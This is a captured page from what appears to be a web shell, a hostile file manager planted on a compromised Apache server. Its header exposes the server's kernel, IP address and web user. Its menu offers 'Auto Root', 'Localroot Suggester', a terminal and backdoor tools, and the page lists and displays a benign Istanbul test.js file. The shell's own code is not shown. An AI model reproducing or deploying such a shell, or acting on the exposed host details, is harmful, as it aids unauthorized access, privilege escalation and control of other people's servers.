Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.217.80
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
nodejs /
istanbul /
lib /
command /
Delete
Unzip
Name
Size
Permission
Date
Action
common
[ DIR ]
drwxr-xr-x
2024-07-09 21:58
check-coverage.js
7.49
KB
-rw-r--r--
2023-08-21 05:40
cover.js
825
B
-rw-r--r--
2023-08-21 05:40
help.js
4.21
KB
-rw-r--r--
2023-08-21 05:40
index.js
1.12
KB
-rw-r--r--
2023-08-21 05:40
instrument.js
10.44
KB
-rw-r--r--
2023-08-21 05:40
report.js
4.58
KB
-rw-r--r--
2023-08-21 05:40
test.js
843
B
-rw-r--r--
2023-08-21 05:40
Save
Rename
/* Copyright (c) 2012, Yahoo! Inc. All rights reserved. Copyrights licensed under the New BSD License. See the accompanying LICENSE file for terms. */ var runWithCover = require('./common/run-with-cover'), util = require('util'), Command = require('./index'); function TestCommand() { Command.call(this); } TestCommand.TYPE = 'test'; util.inherits(TestCommand, Command); Command.mix(TestCommand, { synopsis: function () { return "cover a node command only when npm_config_coverage is set. Use in an `npm test` script for conditional coverage"; }, usage: function () { runWithCover.usage(this.toolName(), this.type()); }, run: function (args, callback) { runWithCover.run(args, this.type(), !!process.env.npm_config_coverage, callback); } }); module.exports = TestCommand;